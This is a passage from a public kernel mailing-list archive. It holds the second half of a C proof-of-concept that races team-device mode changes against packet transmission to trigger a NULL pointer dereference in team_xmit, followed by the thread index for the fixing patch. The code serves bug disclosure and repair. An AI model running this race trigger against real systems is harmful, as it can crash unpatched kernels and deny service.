        int r = recv(sk, rbuf, sizeof(rbuf), 0);
        if (r < 0) die("recv RTM_NEWLINK");
        struct nlmsghdr *nh = (struct nlmsghdr *)rbuf;
        if (nh->nlmsg_type == NLMSG_ERROR) {
                struct nlmsgerr *e = NLMSG_DATA(nh);
                if (e->error) {
                        fprintf(stderr, "RTM_NEWLINK: %s (%d)\n",
                                strerror(-e->error), e->error);
                        exit(1);
                }
        }
        close(sk);

        int ifindex = if_nametoindex(name);
        if (!ifindex) die("if_nametoindex");
        return ifindex;
}

static void bring_up(int ifindex)
{
        int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
        if (sk < 0) die("socket rtnetlink");

        struct nlmsg m = {0};
        m.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg));
        m.nh.nlmsg_type = RTM_NEWLINK;
        m.nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
        m.nh.nlmsg_seq = 2;

        struct ifinfomsg *ifi = (struct ifinfomsg *)NLMSG_DATA(&m.nh);
        ifi->ifi_family = AF_UNSPEC;
        ifi->ifi_index = ifindex;
        ifi->ifi_flags = IFF_UP;
        ifi->ifi_change = IFF_UP;

        if (send(sk, &m, m.nh.nlmsg_len, 0) < 0) die("send set-up");
        char rbuf[4096];
        (void)recv(sk, rbuf, sizeof(rbuf), 0);
        close(sk);
}

/* Force carrier on via .ndo_change_carrier (IFLA_CARRIER=33).
 * team_change_carrier() calls netif_carrier_on() unconditionally, which
 * triggers __linkwatch and eventually transitions txq->qdisc from
 * noop_qdisc to noqueue_qdisc; then packets bypass enqueue and reach
 * dev_hard_start_xmit -> team_xmit. */
static void force_carrier_on(int ifindex)
{
        int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
        if (sk < 0) die("socket rtnetlink");

        struct nlmsg m = {0};
        m.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg));
        m.nh.nlmsg_type = RTM_NEWLINK;
        m.nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
        m.nh.nlmsg_seq = 3;

        struct ifinfomsg *ifi = (struct ifinfomsg *)NLMSG_DATA(&m.nh);
        ifi->ifi_family = AF_UNSPEC;
        ifi->ifi_index = ifindex;
        ifi->ifi_change = 0;

        uint8_t carrier = 1;
        nlmsg_add_attr(&m.nh, 33 /* IFLA_CARRIER */, &carrier, sizeof(carrier));

        if (send(sk, &m, m.nh.nlmsg_len, 0) < 0) die("send IFLA_CARRIER");
        char rbuf[4096];
        int r = recv(sk, rbuf, sizeof(rbuf), 0);
        if (r > 0) {
                struct nlmsghdr *nh = (struct nlmsghdr *)rbuf;
                if (nh->nlmsg_type == NLMSG_ERROR) {
                        struct nlmsgerr *e = NLMSG_DATA(nh);
                        if (e->error)
                                fprintf(stderr, "IFLA_CARRIER set: %d (%s)\n",
                                        e->error, strerror(-e->error));
                }
        }
        close(sk);
}

/* ---- generic netlink: resolve family, send team cmds ---- */

struct genl_msg {
        struct nlmsghdr nh;
        struct genlmsghdr gh;
        char buf[4096];
};

static int genl_resolve_family(const char *name)
{
        int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
        if (sk < 0) die("socket genl");

        struct genl_msg m = {0};
        m.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct genlmsghdr));
        m.nh.nlmsg_type = GENL_ID_CTRL;
        m.nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
        m.nh.nlmsg_seq = 1;
        m.gh.cmd = CTRL_CMD_GETFAMILY;
        m.gh.version = 1;

        struct rtattr *a = (struct rtattr *)((char *)&m + NLMSG_ALIGN(m.nh.nlmsg_len));
        a->rta_type = CTRL_ATTR_FAMILY_NAME;
        a->rta_len = RTA_LENGTH(strlen(name) + 1);
        strcpy(RTA_DATA(a), name);
        m.nh.nlmsg_len = NLMSG_ALIGN(m.nh.nlmsg_len) + RTA_ALIGN(a->rta_len);

        if (send(sk, &m, m.nh.nlmsg_len, 0) < 0) die("send GETFAMILY");

        char rbuf[4096];
        int r = recv(sk, rbuf, sizeof(rbuf), 0);
        if (r < 0) die("recv GETFAMILY");

        struct nlmsghdr *nh = (struct nlmsghdr *)rbuf;
        if (nh->nlmsg_type == NLMSG_ERROR) {
                close(sk);
                return -1;
        }
        struct genlmsghdr *gh = NLMSG_DATA(nh);
        int attrlen = nh->nlmsg_len - NLMSG_SPACE(sizeof(*gh));
        struct rtattr *at = (struct rtattr *)((char *)gh + NLMSG_ALIGN(sizeof(*gh)));
        int id = -1;
        while (RTA_OK(at, attrlen)) {
                if (at->rta_type == CTRL_ATTR_FAMILY_ID) {
                        id = *(uint16_t *)RTA_DATA(at);
                        break;
                }
                at = RTA_NEXT(at, attrlen);
        }
        close(sk);
        return id;
}

static int set_team_mode(int family_id, int ifindex, const char *mode_name)
{
        int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
        if (sk < 0) return -1;

        struct genl_msg m = {0};
        m.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct genlmsghdr));
        m.nh.nlmsg_type = family_id;
        m.nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
        m.nh.nlmsg_seq = 1;
        m.gh.cmd = TEAM_CMD_OPTIONS_SET;
        m.gh.version = TEAM_GENL_VERSION;

        struct nlmsghdr *nh = &m.nh;

        uint32_t idx = ifindex;
        nlmsg_add_attr(nh, TEAM_ATTR_TEAM_IFINDEX, &idx, sizeof(idx));

        /* nested LIST_OPTION { ITEM_OPTION { name=mode, type=NLA_STRING, data=mode_name } } */
        struct rtattr *list = nlmsg_add_nested(nh, TEAM_ATTR_LIST_OPTION);
        struct rtattr *item = nlmsg_add_nested(nh, TEAM_ATTR_ITEM_OPTION);
        nlmsg_add_attr(nh, TEAM_ATTR_OPTION_NAME, "mode", 5);
        uint8_t type = POC_NLA_STRING;
        nlmsg_add_attr(nh, TEAM_ATTR_OPTION_TYPE, &type, sizeof(type));
        nlmsg_add_attr(nh, TEAM_ATTR_OPTION_DATA, mode_name, strlen(mode_name) + 1);
        nlmsg_end_nested(nh, item);
        nlmsg_end_nested(nh, list);

        if (send(sk, &m, nh->nlmsg_len, 0) < 0) {
                close(sk);
                return -1;
        }
        char rbuf[4096];
        int r = recv(sk, rbuf, sizeof(rbuf), 0);
        close(sk);
        if (r < 0) return -1;
        struct nlmsghdr *rh = (struct nlmsghdr *)rbuf;
        if (rh->nlmsg_type == NLMSG_ERROR) {
                struct nlmsgerr *e = NLMSG_DATA(rh);
                return e->error;
        }
        return 0;
}

/* ---- threads ---- */

static void pin_to_cpu(int cpu)
{
        cpu_set_t set;
        CPU_ZERO(&set);
        CPU_SET(cpu, &set);
        sched_setaffinity(0, sizeof(set), &set);
}

static void *xmit_thread(void *arg)
{
        int cpu = (long)arg;
        pin_to_cpu(cpu);

        int sk = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
        if (sk < 0) { perror("AF_PACKET"); return NULL; }

        struct sockaddr_ll sll = {0};
        sll.sll_family = AF_PACKET;
        sll.sll_ifindex = g_team_ifindex;
        sll.sll_protocol = htons(ETH_P_ALL);
        sll.sll_halen = 6;
        memset(sll.sll_addr, 0xff, 6);

        if (bind(sk, (struct sockaddr *)&sll, sizeof(sll)) < 0) {
                perror("bind AF_PACKET");
                close(sk);
                return NULL;
        }

        unsigned char pkt[64];
        memset(pkt, 0xff, 6);
        memset(pkt + 6, 0x11, 6);
        pkt[12] = 0x08; pkt[13] = 0x00;
        memset(pkt + 14, 0, sizeof(pkt) - 14);

        while (!g_stop) {
                for (int i = 0; i < 256; i++)
                        (void)sendto(sk, pkt, sizeof(pkt), 0,
                                     (struct sockaddr *)&sll, sizeof(sll));
                __sync_fetch_and_add(&g_xmits, 256);
        }
        close(sk);
        return NULL;
}

static void *flipper_thread(void *arg)
{
        int cpu = (long)arg;
        pin_to_cpu(cpu);

        const char *modes[] = { "roundrobin", "activebackup", "broadcast" };
        int i = 0;
        while (!g_stop) {
                const char *m = modes[i % 3];
                (void)set_team_mode(g_team_family, g_team_ifindex, m);
                i++;
                __sync_fetch_and_add(&g_flips, 1);
        }
        return NULL;
}

int main(void)
{
        setbuf(stdout, NULL);
        printf("[*] team ops race PoC starting\n");

        g_team_ifindex = create_team_device("team0");
        printf("[*] team0 created, ifindex=%d\n", g_team_ifindex);

        bring_up(g_team_ifindex);
        printf("[*] team0 is up\n");
        force_carrier_on(g_team_ifindex);
        printf("[*] team0 carrier forced ON\n");

        g_team_family = genl_resolve_family("team");
        if (g_team_family < 0) {
                fprintf(stderr, "failed to resolve team genl family\n");
                return 1;
        }
        printf("[*] team genl family id=%d\n", g_team_family);

        int rc = set_team_mode(g_team_family, g_team_ifindex, "roundrobin");
        printf("[*] initial set mode roundrobin -> %d\n", rc);

        long nthr = sysconf(_SC_NPROCESSORS_ONLN);
        if (nthr < 2) nthr = 2;
        if (nthr > 8) nthr = 8;

        pthread_t fl;
        pthread_create(&fl, NULL, flipper_thread, (void *)(long)0);

        pthread_t xt[8];
        for (long t = 0; t < nthr - 1; t++)
                pthread_create(&xt[t], NULL, xmit_thread,
                               (void *)(long)((t + 1) % nthr));

        for (int s = 0; s < 60 && !g_stop; s++) {
                sleep(1);
                if ((s % 5) == 0)
                        printf("[*] running... %d/60  flips=%lu xmits=%lu\n",
                               s, g_flips, g_xmits);
        }

        g_stop = 1;
        pthread_join(fl, NULL);
        for (long t = 0; t < nthr - 1; t++)
                pthread_join(xt[t], NULL);

        printf("[*] done (no crash observed from userspace side)\n");
        return 0;
}
```

^ permalink raw reply	[flat|nested] 8+ messages in thread

end of thread, other threads:[~2026-05-19  8:57 UTC | newest]

Thread overview: 8+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-05-09 18:18 [PATCH net v2] net: team: fix NULL pointer dereference in team_xmit during mode change Weiming Shi
2026-05-10 15:25 ` Jakub Kicinski
2026-05-10 16:06   ` Weiming Shi
2026-05-10 16:59     ` Jakub Kicinski
2026-05-18  9:51       ` Weiming Shi
2026-05-18 21:22         ` Jakub Kicinski
2026-05-19  8:51           ` Weiming Shi
2026-05-19  8:57           ` Weiming Shi

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox